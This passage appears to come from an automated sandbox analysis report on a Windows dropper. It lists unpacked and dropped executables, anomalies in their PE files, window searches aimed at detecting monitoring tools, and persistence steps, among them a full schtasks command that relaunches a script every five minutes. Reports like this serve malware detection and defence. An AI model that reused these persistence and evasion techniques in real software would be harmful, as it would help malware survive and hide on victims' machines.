                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 3.2.rapes.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 4.2.rapes.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeUnpacked PE file: 5.2.2R0700.exe.980000.0.unpack :EW;.rsrc:W;.idata :W;grsopbsh:EW;hjwgpcua:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;grsopbsh:EW;hjwgpcua:EW;.taggant:EW;
                              .NET source code contains potential unpacker
                              Source: T0QdO0l[1].exe.9.dr, SequentialStrategy.cs.Net Code: CountStrategy System.AppDomain.Load(byte[])
                              Source: T0QdO0l.exe.9.dr, SequentialStrategy.cs.Net Code: CountStrategy System.AppDomain.Load(byte[])
                              Source: pwHxMTy[1].exe.9.drStatic PE information: 0x8F8A52CD [Tue Apr 24 18:24:13 2046 UTC]
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00FA202A
                              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                              Source: 9hUDDVk.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x6f27c0
                              Source: rapes.exe.2.drStatic PE information: real checksum: 0x1e2152 should be: 0x1e8ddb
                              Source: DuiLib_u.dll.16.drStatic PE information: real checksum: 0xda891 should be: 0xda31a
                              Source: T0QdO0l.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x15767d
                              Source: uvwnwebboksg.51.drStatic PE information: real checksum: 0x0 should be: 0x118c1c
                              Source: 3E11p.exe.0.drStatic PE information: real checksum: 0x1c2d55 should be: 0x1c2d87
                              Source: amnew[1].exe.9.drStatic PE information: real checksum: 0x0 should be: 0x724e5
                              Source: pwHxMTy[1].exe.9.drStatic PE information: real checksum: 0x0 should be: 0x66274
                              Source: ADFoyxP[1].exe.9.drStatic PE information: real checksum: 0x381fe3 should be: 0x3875ef
                              Source: packed.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x176c7d
                              Source: 2R0700.exe.1.drStatic PE information: real checksum: 0x3210c2 should be: 0x3216f6
                              Source: han.19.drStatic PE information: real checksum: 0x0 should be: 0x118c1c
                              Source: DuiLib_u.dll.17.drStatic PE information: real checksum: 0xda891 should be: 0xda31a
                              Source: pwHxMTy.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x66274
                              Source: ADFoyxP.exe.9.drStatic PE information: real checksum: 0x381fe3 should be: 0x3875ef
                              Source: amnew.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x724e5
                              Source: 9hUDDVk[1].exe.9.drStatic PE information: real checksum: 0x0 should be: 0x6f27c0
                              Source: T0QdO0l[1].exe.9.drStatic PE information: real checksum: 0x0 should be: 0x15767d
                              Source: 1E08u3.exe.1.drStatic PE information: real checksum: 0x1e2152 should be: 0x1e8ddb
                              Source: packed[1].exe.9.drStatic PE information: real checksum: 0x0 should be: 0x176c7d
                              Source: 3E11p.exe.0.drStatic PE information: section name:
                              Source: 3E11p.exe.0.drStatic PE information: section name: .idata
                              Source: 3E11p.exe.0.drStatic PE information: section name:
                              Source: 3E11p.exe.0.drStatic PE information: section name: xsbgiknq
                              Source: 3E11p.exe.0.drStatic PE information: section name: fhlnseet
                              Source: 3E11p.exe.0.drStatic PE information: section name: .taggant
                              Source: 1E08u3.exe.1.drStatic PE information: section name:
                              Source: 1E08u3.exe.1.drStatic PE information: section name: .idata
                              Source: 1E08u3.exe.1.drStatic PE information: section name:
                              Source: 1E08u3.exe.1.drStatic PE information: section name: ezfgyvbn
                              Source: 1E08u3.exe.1.drStatic PE information: section name: ajpekoqk
                              Source: 1E08u3.exe.1.drStatic PE information: section name: .taggant
                              Source: 2R0700.exe.1.drStatic PE information: section name:
                              Source: 2R0700.exe.1.drStatic PE information: section name: .idata
                              Source: 2R0700.exe.1.drStatic PE information: section name: grsopbsh
                              Source: 2R0700.exe.1.drStatic PE information: section name: hjwgpcua
                              Source: 2R0700.exe.1.drStatic PE information: section name: .taggant
                              Source: rapes.exe.2.drStatic PE information: section name:
                              Source: rapes.exe.2.drStatic PE information: section name: .idata
                              Source: rapes.exe.2.drStatic PE information: section name:
                              Source: rapes.exe.2.drStatic PE information: section name: ezfgyvbn
                              Source: rapes.exe.2.drStatic PE information: section name: ajpekoqk
                              Source: rapes.exe.2.drStatic PE information: section name: .taggant
                              Source: bncn6rv.exe.9.drStatic PE information: section name:
                              Source: bncn6rv.exe.9.drStatic PE information: section name: .rsrc
                              Source: bncn6rv.exe.9.drStatic PE information: section name: .idata
                              Source: bncn6rv.exe.9.drStatic PE information: section name:
                              Source: bncn6rv.exe.9.drStatic PE information: section name: hbloxsmk
                              Source: bncn6rv.exe.9.drStatic PE information: section name: bicjwbqp
                              Source: pwHxMTy[1].exe.9.drStatic PE information: section name: .CSS
                              Source: pwHxMTy.exe.9.drStatic PE information: section name: .CSS
                              Source: HmngBpR.exe.9.drStatic PE information: section name: .didata
                              Source: HmngBpR[1].exe.9.drStatic PE information: section name: .didata
                              Source: bncn6rv[1].exe.9.drStatic PE information: section name:
                              Source: bncn6rv[1].exe.9.drStatic PE information: section name: .rsrc
                              Source: bncn6rv[1].exe.9.drStatic PE information: section name: .idata
                              Source: bncn6rv[1].exe.9.drStatic PE information: section name:
                              Source: bncn6rv[1].exe.9.drStatic PE information: section name: hbloxsmk
                              Source: bncn6rv[1].exe.9.drStatic PE information: section name: bicjwbqp
                              Source: msvcp140.dll.16.drStatic PE information: section name: .didat
                              Source: msvcp140.dll.17.drStatic PE information: section name: .didat
                              Source: han.19.drStatic PE information: section name: .xyz
                              Source: han.19.drStatic PE information: section name: hlvtkr
                              Source: uvwnwebboksg.51.drStatic PE information: section name: .xyz
                              Source: uvwnwebboksg.51.drStatic PE information: section name: hlvtkr
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA724D push ecx; ret 0_2_00FA7260
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCode function: 1_2_0092724D push ecx; ret 1_2_00927260
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeCode function: 2_2_04D90390 push 0000005Bh; retn 0008h2_2_04D903A3
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeCode function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                              Source: 3E11p.exe.0.drStatic PE information: section name: xsbgiknq entropy: 7.953699170235273
                              Source: 1E08u3.exe.1.drStatic PE information: section name: entropy: 7.977726294701571
                              Source: 1E08u3.exe.1.drStatic PE information: section name: ezfgyvbn entropy: 7.953436126145147
                              Source: 2R0700.exe.1.drStatic PE information: section name: entropy: 7.156207414551347
                              Source: rapes.exe.2.drStatic PE information: section name: entropy: 7.977726294701571
                              Source: rapes.exe.2.drStatic PE information: section name: ezfgyvbn entropy: 7.953436126145147
                              Source: bncn6rv.exe.9.drStatic PE information: section name: hbloxsmk entropy: 7.954850446877664
                              Source: T0QdO0l[1].exe.9.drStatic PE information: section name: .text entropy: 7.868855860119579
                              Source: T0QdO0l.exe.9.drStatic PE information: section name: .text entropy: 7.868855860119579
                              Source: bncn6rv[1].exe.9.drStatic PE information: section name: hbloxsmk entropy: 7.954850446877664

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files with a suspicious file extension
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353090\Seat.comJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeFile created: C:\Users\user\AppData\Roaming\Dockerprotectysd\DuiLib_u.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeFile created: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeJump to dropped file
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeFile created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\DuiLib_u.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\HmngBpR[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeFile created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\T0QdO0l[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10115790101\T0QdO0l.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeFile created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\bncn6rv[1].exeJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\uvwnwebboksgJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\packed[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\ADFoyxP[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeFile created: C:\Users\user\AppData\Roaming\Dockerprotectysd\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeFile created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pwHxMTy[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10122730101\bncn6rv.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353090\Seat.comJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10123540101\packed.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeFile created: C:\Users\user\AppData\Roaming\Dockerprotectysd\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeFile created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\vcruntime140.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\hanJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeJump to dropped file
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\3E11p.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\9hUDDVk[1].exeJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\hanJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\uvwnwebboksgJump to dropped file
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00FA1AE8
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCode function: 1_2_00921AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00921AE8

                              Boot Survival

                              barindex
                              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonclassJump to behavior
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1Jump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Found hidden mapped module (file has been removed from disk)
                              Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\HAN
                              Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\UVWNWEBBOKSG
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
